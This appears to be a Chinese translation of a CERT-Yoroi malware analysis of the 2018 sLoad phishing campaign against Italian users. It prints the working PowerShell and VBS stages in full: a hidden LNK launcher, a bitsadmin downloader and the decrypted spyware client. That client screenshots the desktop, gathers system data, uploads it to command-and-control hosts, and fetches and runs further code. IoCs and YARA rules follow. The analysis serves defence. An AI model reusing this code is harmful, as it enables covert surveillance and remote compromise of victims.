导语:近日一个新的malspam攻击了意大利,威胁行为者正在传播一个名为sLoad的强大的downloader的新变种。
一、介绍
在过去的几个月里,CERT-Yoroi观察到一种新兴攻击模式。一系列恶意电子邮件共享通用技术,这些技术可能与一个威胁组织对意大利网络全面的攻击有关。目前尚不清楚这些攻击尝试是由一个完善的网络犯罪组织修改其TTP所致,还是全新的攻击尝试。但CERT-Yoroi正在通过内部代号“Sload-ITA”(TH-163)来跟踪此威胁。去年五月,SANS ICS研究人员在英国也记录了类似的操作行为。恶意行动通过滥用基于压缩存档中的代码隐藏技术和类似的drop-url模式共享相同的drop mode:
· 2018-10-08 – 使用“/AE-9455933DGW-nota-cliente” url 模式
· 2018-10-09 – 使用“/fattura-per-cliente-QN-OAYSAPV” url 模式
· 2018-10-15 –使用“/MA-47462780Y3-documento-cliente” url 模式
· 某些恶意邮件已从“PEC”邮箱发送
· 2018-11-19 – 使用 “/documento-aggiornato-novembre-ER16909FP9”
· CERT-PA 追踪
Yoroi-Cybaze ZLAB收集并解析了在响应操作期间恢复的样本,用来揭示这些攻击者使用的恶意植入程序的细节。下图总结了sLoad恶意软件感染的步骤。
图1. SLoad感染流程
二、技术分析
分析的恶意样本是压缩zip存档,包含两个不同文件:
1. 一个假装指向系统文件夹的链接,名为“invio fattura elettronica.lnk”
2. 一个隐藏的JPEG图像“image _20181119_100714_40.jpg”,该文件存储为HA属性。
尽管从存档中提取的LNK文件表面上看很无辜,但它的武器化方式与APT29在其最新操作期间采用的方式类似,表明该技术是几种恶意网络武器的一部分。实际上,当用户双击文件时,批处理脚本会生成下面的powershell脚本:
C:\Windows\System32\cmd.exe /C powershell.exe -nop -eP ByPass -win hi"d"den -c "&{$9oc=get-childItem -path c:\users\* -recurse -force -include documento-aggiornato-novembre-*.zip;$g3u=get-content -LiteralPat $9oc.fullname;$g3u[$g3u.length-1]|iex}"
PS脚本搜索与模式“documento-aggiornato-novembre – * .zip”匹配的任何文件:如果文件存在,则脚本在其末尾提取一部分代码,然后通过“IEX”调用它;我们检查了zip文件并恢复了这部分代码。在下图中,可以看到附件存档内容分为粉红色和黄色,外来代码为蓝色。
图2.添加到Zip存档的代码
该部分文件包含powershell脚本调用的可执行代码。由于调用了“bitsadmin.exe”,此代码能够从“firetechnicaladvisor.com”下载其他脚本,然后将所有这些新下载的文件存储在“%APPDATA%/ <UUID>”文件夹中。下图显示了下载恶意植入程序后文件夹的内容:
图3.恶意植入程序的组件
下面的片段显示了负责下载这些恶意软件的代码。
$env_appData=$env:appdata; $cmd='cmd'; $gen_random_value_name_ps= -join ((65..90) + (97..122) | Get-Random -count 14 | % {[char]$_}); $get_uuid=(Get-WmiObject Win32_computerSystemProduct).UUid; $set_hidden='hidden'; $folder_to_store_file = $env_appData+'\'+$get_uuid; $h=$folder_to_store_file+'\d'; if(!(test-path $folder_to_store_file)){ New-item -itemtype directory -Force -path $folder_to_store_file; }; $ps_to_download_and_execute='/c echo 1 > '+$h+' & bitsadmin /wrap /transfer fredikasledi /download /priority FOReGrOUnd "https://firetechnicaladvisor.com/globa/monu" '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & del '+$h+' & exit'; start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute; $e=1; Start-Sleep -s 6; $p2='powe'; while($e -eq 1){ if(test-path $h) Start-Sleep -s 3 }else{ $e=2 } }; Start-Sleep -s 7; $p1='ell'; $ps_to_download_and_execute='/c '+$p2+'rsh'+$p1+' -nop -ep bypass -File '+$folder_to_store_file+'\'+$gen_random_value_name_ps+'.ps1 & exit'; start-process -wiNdowstyLe $set_hidden $cmd $ps_to_download_and_execute;
NxPgKLnYEhMjXT.ps1脚本安装并植入受害者的机器,在系统上注册计划任务,以确保感染持续存在。然后,该脚本会自删除。
图4.恶意植入程序的安装脚本
在快速查看CxeLtfwc.ps1脚本之后,我们还注意到恶意软件使用cmdlet“Invoke-Expression”从“config.ini”文件加载并运行另一段代码。
param ([string]$k = ""); $random_name_of_powershell=Get-Process -name powershell*; if ($random_name_of_powershell.length -lt 2){ $folder_name = (Get-WmiObject Win32_ComputerSystemProduct).UUID ; $log = $env:APPDATA+"\"+$folder_name; $key=$k -split "," ; $Secure= Get-Content $log"\config.ini"; $Encrypted= ConvertTo-SecureString $Secure -key $key; $encrypted_string = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted); $expression_to_execute = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($encrypted_string); Invoke-Expression $expression_to_execute; }
下图显示了恶意植入程序的其他组件如何调用此特定代码:可以注意到脚本是使用输入参数(“1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16“)启动的,该参数作为密钥来解密”config.ini“的内容:恶意软件的真实有效载荷。
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden -ep bypass -File C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\CxeLtfwc.ps1 -k 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -------------- C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\<NOME_CASUALE>.vbs" 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -------------- Dim objWmi, colItems, objItem, strUUID, blnValidUUID,oShell Set objWmi = GetObject("winmgmts:\\" & "." & "\root\cimv2") Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct") Set oShell = WScript.CreateObject ("WScript.Shell") oShell.run "power"+"shel"+"l.exe -win hi"+"dden -ep by"+"pass -Fi"+"le C:\Users\admin\AppData\Roaming\42082A54-EE38-CA41-8C45-A16336FBCCD9\WpaejPkv.ps1 -k "& WScript.Arguments(0),0,True Set oShell = Nothing
“config.ini”和“web.ini”文件都在运行时通过以下一组系统命令来进行解密和调用:
“ConvertTo-SecureString”, [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted); [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr);
下图显示了“config.ini”文件加密后代码的一部分,之后是其解密的代码。
图5.“config.ini”中的加密有效载荷
这是恶意客户端的源代码:
$runDMC = "cmd"; [email protected](1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16) $morty=$env:APPDATA; function Get-ScreenCapture{ Param( [Parameter()] [Alias("Path")] [string]$Directory = ".", [Parameter()] [ValidateRange(70,100)] [int]$Quality, [Parameter()] [Switch]$AllScreens ) Set-StrictMode -Version 2 Add-Type -AssemblyName System.Windows.Forms if ($AllScreens){ $Capture = [System.Windows.Forms.Screen]::AllScreens }else{ $Capture = [System.Windows.Forms.Screen]::PrimaryScreen } foreach ($C in $Capture){ $screenCapturePathBase = $path+"\ScreenCapture" $cc = 0 while (Test-Path "${screenCapturePathBase}${cc}.jpg") { $cc++ } $FileName="${screenCapturePathBase}${cc}.jpg" $Bitmap = New-Object System.Drawing.Bitmap($C.Bounds.Width, $C.Bounds.Height) $G = [System.Drawing.Graphics]::FromImage($Bitmap) $G.CopyFromScreen($C.Bounds.Location, (New-Object System.Drawing.Point(0,0)), $C.Bounds.Size) $g.Dispose() $Quality=70; $EncoderParam = [System.Drawing.Imaging.Encoder]::Quality $EncoderParamSet = New-Object System.Drawing.Imaging.EncoderParameters(1) $EncoderParamSet.Param[0] = New-Object System.Drawing.Imaging.EncoderParameter($EncoderParam, $Quality) $JPGCodec = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where{$_.MimeType -eq 'image/jpeg'} $Bitmap.Save($FileName ,$JPGCodec, $EncoderParamSet) } } $productID = (Get-WmiObject Win32_ComputerSystemProduct).UUID ; $path = $morty+"\"+$productID; $btlog=$path+'\btc.log' $pp=$path+'\'+$productID; try{ If(test-path $pp"_0"){ Remove-Item $pp"_*";}}catch{} try{ If(test-path $pp){Remove-Item $pp;}}catch{} $ldf='/C bitsadmin /reset'; start-process -wiNdowStylE HiDden $runDMC $ldf; $Secure= Get-Content $path"\web.ini"; $Encrypted= ConvertTo-SecureString $Secure -key $key; $slStr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Encrypted); $rStr = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($slStr); $d=$rStr -split "," For ($i=0; $i -le $d.Length-1; $i++){ if ($d[$i] -match "http"){ $rp= -join ((65..90) + (97..122) | Get-Random -Count 8 | % {[char]$_}) $ldf='/C bitsadmin /transfer '+$rp+' /download /priority normal "'+$d[$i]+'/captcha.php?ch=1" '+$path+'\'+$productID+'_'+$i; start-process -wiNdowStylE HiDden $runDMC $ldf; } } $e=1;$dd=0; while($e -eq 1){ $ad=2; For ($i=0; $i -le $d.Length-1; $i++){ $pp=$path+'\'+$productID+'_'+$i; if([System.IO.File]::Exists($pp)){ $line=Get-Content $pp if ($line -eq "sok"){ $did=$i;} $ad=1; } } $dd++; if ($dd -gt 60) { $outU=""; For ($i=0; $i -le $d.Length-1; $i++){ if ($d[$i] -match "http"){ $l=$d[$i].split(".")[0] -replace "[^0-9]" , ''; $p=$d[$i].split(".")[1] -replace "[^A-Z/]" , ''; $n=[int]$l+1; $r1=$l+'.'+$p; if ($n -gt 50){ $n=1;} $r2=[string]$n+'.'+$p; $outU+=$d[$i]+"," -replace $r1, $r2 } } $Secure = ConvertTo-SecureString $outU -AsPlainText -Force $Encrypted = ConvertFrom-SecureString -SecureString $Secure -key $key $Encrypted | out-file $path"\web.ini"; stop-process -name powershell* } if ($ad -eq 1){ $e=2;} Start-Sleep -s 3 } $rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_}) $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'new/u.jpg" "'+$path+'\web.ini" & exit '; $ldf | out-file $path'\asd' start-process -wiNdowStylE HiDden $runDMC $ldf; $outD=""; $dd=Get-WmiObject -Class Win32_LogicalDisk | Where-Object {$_.Description -match 'Network'} | Select-Object ProviderName,DeviceID; try{ if ($dd ){for ($i=0; $i -le $dd.length; $i++){$outD=$outD+'{'+$dd[$i].DeviceID+''+$dd[$i].ProviderName+'}';}} }catch {} try{ if ($dd -and $outD -eq "" ){$outD='{'+$dd[$i].DeviceID+''+$dd.ProviderName+'}';}}catch {} try{ $nw=$path+'\_nw'; $nr=$path+'\_nr'; $rf='/C net view > '+$nw+' & copy '+$nw+' '+$nr+' & exit'; start-process -wiNdowStylE HiDden cmd $rf; $e=1;while($e -eq 1){If(test-path $nr){$e=3;}Start-Sleep -s 3;} $l=get-content $nr; $gk=$l -match '\\'; if ($gk -and $gk.length -gt 1){ $outD=$outD+'{in network:'+$gk.length+'}'; } remove-item $nr }catch{} $cp=Get-WmiObject win32_processor | select Name; try{ if ($cp.length -gt 0){ $cpu=$cp[0].Name }else{$cpu=$cp.Name} }catch {} try{$v1=(gwmi win32_operatingsystem).caption }catch {} try{ Remove-Item $path"\*.jpg";}catch{} try{ if([System.IO.File]::Exists($path+"\f.ini")){ $ci=Get-Content $path"\f.ini"; }else{ $ci=0; for ($i=0;$i -le 3;$i++){ Get-ScreenCapture; Start-Sleep -s 40; } $cit=Get-ChildItem -Path c:\users -Filter *.ICA -Recurse -ErrorAction SilentlyContinue -Force if ($cit){ $ci=1; } $ci | Out-File $path"\f.ini" } }catch{} if (test-path $path"\..\Microsoft\Outlook\"){$ot=1;}else{$ot=0;} try {$lnk=([System.Uri]$d[$did]).Host}catch{} $s=0; while($true){ $out=""; $tt=Get-Process | Select-Object name for ($i=0; $i -le $tt.length-1; $i++){ $out=$out+"*"+$tt[$i].Name; } $rp= -join ((65..90) + (97..122) | Get-Random -Count 12 | % {[char]$_}) $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND "'+$d[$did]+'captcha.php?lnk='+$lnk+'&s='+$s+'&g=pu&c='+$ci+'&id='+$productID+'&v='+$v1+'&c='+$rp+'&a='+$out+'&d='+$outD+'&n='+$env:ComputerName+'&cpu='+$cpu+'&o='+$ot+'" '+$path+'\'+$productID+' > '+$btlog+' & exit '; start-process -wiNdowStylE HiDden $runDMC $ldf; Start-Sleep -s 120; $pp=$path+'\'+$productID; if([System.IO.File]::Exists($pp)){ $line=Get-Content $pp; if ($line -match "run="){ $u=$line -replace 'run=',''; $ldf="/C powershell.exe -command iex ((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('"+$u+"')))"; start-process -wiNdowStylE HiDden $runDMC $ldf; }elseif ($line.length -gt 3){ try{ Remove-Item $path"\*.jpg";}catch{} $dPath = [Environment]::GetFolderPath("MyDocuments") $rp= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_}) $ldf='/C bitsadmin /transfer '+$rp+' /download /priority FOREGROUND '+$line+' '+$path+'\'+$productID+'_'+$rp+'.txt & Copy /Z '+$path+'\'+$productID+'_'+$rp+'.txt '+$path+'\'+$productID+'_'+$rp+'_1.txt & certutil -decode '+$path+'\'+$productID+'_'+$rp+'_1.txt '+$dPath+'\'+$productID+'_'+$rp+'.exe & powershell -command "start-process '+$dPath+'\'+$productID+'_'+$rp+'.exe" & bitsadmin /transfer '+$rp+'s /download /priority normal "'+$d[$did]+'gate.php?n='+$env:ComputerName+'&ts=1&id='+$productID+'&c='+$rp+'" '+$path+'\'+$productID+'_'+$rp+'.txt & exit'; start-process -wiNdowStylE HiDden $runDMC $ldf; for ($i=0;$i -le 5;$i++){ Get-ScreenCapture; Start-Sleep -s 40; } $ldf='/C del '+$path+'\'+$productID+'_'+$rp+'.txt & del '+$path+'\'+$productID+'_'+$rp+'_1.txt & del '+$dPath+'\'+$productID+'_'+$rp+'.exe & exit'; start-process -wiNdowStylE HiDden $runDMC $ldf; } } for ($i=0; $i -le 5; $i++){ $scr=$path+"\ScreenCapture"+$i+".jpg" if([System.IO.File]::Exists($scr)){ $rur= -join ((65..90) + (97..122) | Get-Random -Count 16 | % {[char]$_}); $rf='/C bitsadmin /transfer '+$rur+' /upload /priority FOREGROUND "'+$d[$did]+'p.php?n='+$env:ComputerName+'&id='+$productID+'&i='+$i+'&s='+$rur+'" "'+$scr+'" & del "'+$scr+'" & exit'; start-process -wiNdowStylE HiDden $runDMC $rf; } } if([System.IO.File]::Exists($btlog)){ $e=0; foreach($line in Get-Content $btlog -Encoding UTF8) { if ($line -match "ERROR"){ $e++; } } if ($e -gt 0 ){ $rf='/C bitsadmin /reset & exit'; start-process -wiNdowStylE HiDden $runDMC $rf; stop-process -name powershell* } } Start-Sleep -s 1200; $s++; }
解密“web.ini”的内容会显示恶意植入程序使用的C2的远程地址:https://hamofgri.me/images/,https://ljfumm.me/images/
恶意客户端收集有关受害者计算机的信息,例如:domain,dns cache,running processes,ip和system architecture。此外,它会定期捕获受害者当前桌面的屏幕截图,搜索Microsoft Outlook文件夹并收集用户目录中是否存在“* .ICA”Citrix文件信息。所有这些信息都被发送到命令和控制服务器。提交数据后,它会直接从攻击者那里收到更多的PowerShell代码。此行为是特洛伊木马/间谍软件恶意软件的特征,通常用作重建受感染主机的桥头堡,甚至成为某些更复杂攻击的初始阶段。
图6. VT 给Sload 恶意组件评分
三、总结
最近由第三方安全公司和政府CERT报告的sLoad攻击浪潮对意大利的网络构成了重大威胁,因为攻击者准备了精心设计的钓鱼邮件主题,并且在恶意软件植入时使用的技术和方法检测率很低。
目前尚不清楚这些攻击背后的组织是否是网络犯罪中的全新成员。最初的恶意行动是在2018年5月发现的,针对的是英国用户。而最近针对意大利用户的活动始于去年10月,表明该组织的恶意活动有所扩大。
CERT-Yoroi目前正在跟踪意大利地区的TH-163,ZLAB团队不断分析其部件、恶意软件植入程序和技术,以确保对我们国家的保护。
IoC
恶意urls:
· https://upabovenewyork[.com/.fatturazione/fattura-per-cliente-QN-OAYSAPV
· https://sciencefictionforgirls.[com/cience/ionfo
· upabovenewyork[.com
· 91.218.127.[180
· sciencefictionforgirls[.com
· 185.17.27[.100
· https://rootcellarproductions.[com/documento/AE-9455933DGW-nota-cliente
· https://peatsenglishcider.[com/seng/ishci
· rootcellarproductions[.com
· 91.218.127.[183
· peatsenglishcider.[com
· 185.17.27[.100
· https://three-bottles[.com/area-riservata/MA-47462780Y3-documento-cliente
· https://icodeucode.[com/col/euco
· three-bottles[.com
· 91.218.127.[183
· firetechnicaladvisor.[com
· 185.17.27.[108
· https://cavintageclothing[.com/update/b746yrthdfb.txt
· cavintageclothing.[com
· 185.17.27[.108
· bureaucratica[.org
· 18.13.7[.20
C2 (sload):
· https://balkher.[eu/doc/p2.txt
· https://balkher.[eu/sload/2.0/hostp1.txt
· https://balkher[.eu/sload//img.php?ch=1
· balkher[.eu
· 185.197.75[.241
· https://perecwarrio[.eu/sload/
· perecwarrior[.eu
· 185.211.246[.50
· https://ljfumm[.me/images/gate.php
· https://hamofgri.[me/images/gate.php
· https://hamofgri.[me/images/captcha.php?ch=1
· https://ljfumm[.me/images/captcha.php?ch=1
· ljfumm[.me
· hamofgri[.me
· 185.197.75[.10
持久性:
· %APPDATA%\<GUID>
Hash:
· b702e8e23165273f8e90615ce4af2f158048bf6b615f545b992fbbb62f7eff27 zip
· 1cbe16ac066aeac78c2f3e41e2afa3433833bf6f65131bcfbf88db97e9b94efb jpg
· d8f4ae0477f7e2931e89e4b6d3e78556d3b5765a2c08bc3bdec8c1f6dc0904c0 lnk
· ed1007884730a664f9cc827fb60924079149a2fec08ca91c2342c368e727c330 zip
· 3b5b6cd6ecef252624ee3b5c80d27647766527920b76ebc533f9bc336bfe91ad jpg
· 0a392ded18578069c647383492253f990210b9c9f9293a6ded09eab7e0936562 jpg
· b19794f283f9c09f997cbfcbec8c30a5e48eb520ee7bcabd0d62c7b527105f42 lnk
· 3866a58fe3d459173a28bfdee3ec7a90d7551761121fba9eda3685a268cdeda5 ps1
· ed99528a9e818fb486e468d9744745fcfd7157cc8e18181dce7404483c12e834 zip
· 97f9bb29083458c88844a2cecca272a22cac8cf7960b76c3fa46e891eeb18236 lnk
· 444e29050bbe68484e33f4e30dbe165186f93884e3336643cfb965156141c5ae jpg
· 6a49ed883ed266682ec275a395e0d7c6489ded6a6d7072e84af696e82f3b49a3 ps1
· f94ebce29158af5f4df34e5af428a514faeef20de08418ad0153ad2a9a07cea0 ps1
· daadae8672c31474047f21008ec131cf6a102dac7ca8b8c6df89d35bdf2246da vbs
· ee1dbf76665f5c07ba1c453d1890aa93307f759c5cce6f59f225111509482a64 ps1
· 062cc76eeb34d1d3bb5467836cd2d33cb973fc0a8129947af074675beb1fbf1f ini
· df1cb74942fe9d0897431752c2d9717190aa38f79834e22aa885ec8881134505
Yara规则
rule image_20181119_100714_50_jpg{ meta: description = "Yara Rule for Trojan/sLoad" author = "Cybaze Zlab_Yoroi" last_updated = "2018-11-21" tlp = "white" category = "informational" strings: $a1 = "Adobe Photoshop" $a2 = {3A 30 33 3A 32 38} $a3 = {FF D8 FF E0} $b = {B4 30 B8 B? ?? ?? ?? BA AD E3 ?? ?? C7 7F 84 6A 09 74 9F 75} condition: $a1 and $a2 and $a3 or $b } rule documento_aggiornato_novembre_ER16909FP9_zip{ meta: description = "Yara Rule for Trojan/sLoad" author = "Cybaze Zlab_Yoroi" last_updated = "2018-11-21" tlp = "white" category = "informational" strings: $a1 = "https://firetechnicaladvisor.com/" $a2 = {24 34 4D 61 30 58 32 6C 49 7A} $a3 = "image_20181119_100714_40.jpg" $a4 = "invio fattura elettronica.lnk" $a5 = {2B 27 2E 70 73 31} $b = {50 4B} condition: 1 of ($a*) and $b } rule _ini_files{ meta: description = "Yara Rule for Trojan/sLoad" author = "Cybaze Zlab_Yoroi" last_updated = "2018-11-21" tlp = "white" category = "informational" strings: $a1 = "DkAYQBjADcANAA3ADUAMwBkADAA" $a2 = "ADMAMgA5AGUAYgA3AGYAM" condition: $a1 or $a2 } rule invio_fattura_elettronica_lnk{ meta: description = "Yara Rule for Trojan/sLoad" author = "Cybaze Zlab_Yoroi" last_updated = "2018-11-21" tlp = "white" category = "informational" strings: $a1 = {63 00 3A 00 5C 00 75 00 73 00 65 00 72 00 73 00 5C 00 2A} $a2 = {4D 5A 35 10 00 53 79 73 74 65 6D 33 32} $b = {4C ??} $c = {63 6D 64 2E 65 78 65} $d = "i.e.x." condition: 1 of ($a*) and $b and $c and $d }